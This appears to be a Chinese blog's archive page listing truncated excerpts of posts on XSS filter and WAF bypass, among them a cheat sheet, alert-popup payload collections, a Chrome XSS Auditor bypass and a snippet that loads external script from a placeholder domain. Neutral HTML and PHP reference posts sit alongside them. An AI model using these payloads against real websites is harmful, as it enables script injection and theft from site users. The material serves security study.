密码保护:基于位置的有效XSS攻击代码

密码保护:基于位置的有效XSS攻击代码
在研究的方式来逃避过滤,检测并阻止在有效载荷中的圆括号存在XSS的尝试,我来到这,将共享这一岗位及其随后的部分问题的有趣的解决方案。 值得注意的是,对被禁止字符的任何编码都不会回避过滤器。 为了实现这一点,我开始使用JavaScript文档位置属性,它使下面的原始有效负载成为可能,但还没有准备好逃避: 1 <svg/onload=location='javascript:alert(1)'><svg...
2017年06月22日 汪洋大海 要查看留言请输入您的密码。 喜欢 0 阅读 2,359 views 次 阅读全文

密码保护:超强绕过XSS的方法

密码保护:超强绕过XSS的方法
如XSSer(一个让XSS)可能知道,脚本标签并不总是能注入一个XSS漏洞是因为它将由开发商或一个WAF过滤后的第一件事(Web应用防火墙)。此外,输入可能仅限于几个字符,这使得在事件处理程序中不可能放置调用外部脚本所需的下列JavaScript代码,例如: 1 with(document)body.appendChild(createElement('script')).src='//DOMAIN'with(document)body.appendChild(createElemen...
2017年06月22日 汪洋大海 要查看留言请输入您的密码。 喜欢 1 阅读 2,583 views 次 阅读全文

HTML 5 全局属性

HTML 5 全局属性
HTML 属性能够赋予元素含义和语境。 下面的全局属性可用于任何 HTML5 元素。   HTML 5 全局属性 NEW:HTML 5 中新的全局属性。 属性 描述 accesskey             != 规定访问元素的键盘快捷键 class                      != 规定元素的类名(用于规定样式表中的类)。 contenteditable 规定是否允许用户编辑内容。 contextmenu 规定元素的上下文菜单。 d...
2017年06月22日 汪洋大海 暂无评论 喜欢 0 阅读 2,276 views 次 阅读全文

HTML 事件属性

HTML 事件属性
全局事件属性 HTML 4 增加了使事件在浏览器中触发动作的能力,比如当用户点击元素时启动 JavaScript。 如需学习更多有关事件编程的知识,请访问我们的 JavaScript 教程。 下面列出了添加到 HTML 元素以定义事件动作的全局事件属性。 != 非HTML5中的事件属性 Window 事件属性 针对 window 对象触发的事件(应用到 <body> 标签): 属性 值 描述 onafterprint scri...
2017年06月22日 汪洋大海 暂无评论 喜欢 0 阅读 2,384 views 次 阅读全文

弹窗小姿势锦集

弹窗小姿势锦集
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 <script>prompt(1)</script...
2017年06月22日 汪洋大海 暂无评论 喜欢 0 阅读 3,251 views 次 阅读全文

xss 之 无需 eval (收集不同方法来执行字符串,无需显式调用eval()函数)

xss 之 无需 eval (收集不同方法来执行字符串,无需显式调用eval()函数)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 /***********************/ /* Encoded eval string */ /***********************/ &...
2017年06月21日 汪洋大海 暂无评论 喜欢 2 阅读 3,234 views 次 阅读全文

XSS Cheat Sheet

XSS Cheat Sheet
本文有一个重点需要GET到。 Technique Vector/Payload * * In URLs: & => %26 ,  # => %23 ,  + => %2B HTML Context Tag Injection <svg onload=alert(1)> "><svg onload=alert(1)// HTML Context Inline Injection "onmouseover=alert(1)// "autofocus/onfocus=alert(1)// Javascript Context Code Injection '-alert(1)-' '-...
2017年06月20日 汪洋大海 暂无评论 喜欢 0 阅读 3,484 views 次 阅读全文

密码保护:bypass的xss filter

密码保护:bypass的xss filter
原文链接:http://zone.wooyun.org/content/6899 不过个人很喜欢收集xss payload.在这里把自己平时挖xss时会用到的payloads列出来和大家一起分享。很希望大家能把自己的一些payload也分享出来。(由于我是linux党,所以本文出现在的所有payload只在firefox和chrome之下进行过测试。IE不在本文的讨论范围之内。本文只以直接输出在HTML的情况为中心进行探讨。)有错误的地方还...
2017年06月20日 汪洋大海 要查看留言请输入您的密码。 喜欢 0 阅读 2,697 views 次 阅读全文

密码保护:浏览器安全 之 Chrome XSS Auditor bypass

密码保护:浏览器安全 之 Chrome XSS Auditor bypass
因大神不让转载,我这只能是偷摸转载,然后隐藏了。虽然我标注了转载地址,作者名字,但是毕竟人家说不让转载了,不加密不好。。。。 (2017-05-06 更新,chrome57更新了xss auditor的拦截方式,大量payload不能用了) (2017-05-06 更新,chrome57更新了xss auditor的拦截方式,大量payload不能用了) Bypass 4 (需交互的bypass) 直到chrome 57可用。 ?c=<svg><...
2017年06月17日 汪洋大海 要查看留言请输入您的密码。 喜欢 0 阅读 3,302 views 次 阅读全文

PHP中的抽象类与抽象方法/静态属性和静态方法/PHP中的单利模式(单态模式)/串行化与反串行化(序列化与反序列化)/约束类型/魔术方法小结

PHP中的抽象类与抽象方法/静态属性和静态方法/PHP中的单利模式(单态模式)/串行化与反串行化(序列化与反序列化)/约束类型/魔术方法小结
PHP中的抽象类与抽象方法 1、什么是抽象方法? 没有方法体 {} 的方法,必须使用abstract 关键字修饰。这样的方,我们叫做抽象方法。 abstract function say(); // 抽象方法 2、什么是抽象类? 包含抽象方法的类就叫抽象类。抽象类必须使用abstract关键字修饰。 abstract class Person{} 3、抽象类的注意事项 ① 抽象类可以包...
2017年06月16日 汪洋大海 暂无评论 喜欢 1 阅读 2,713 views 次 阅读全文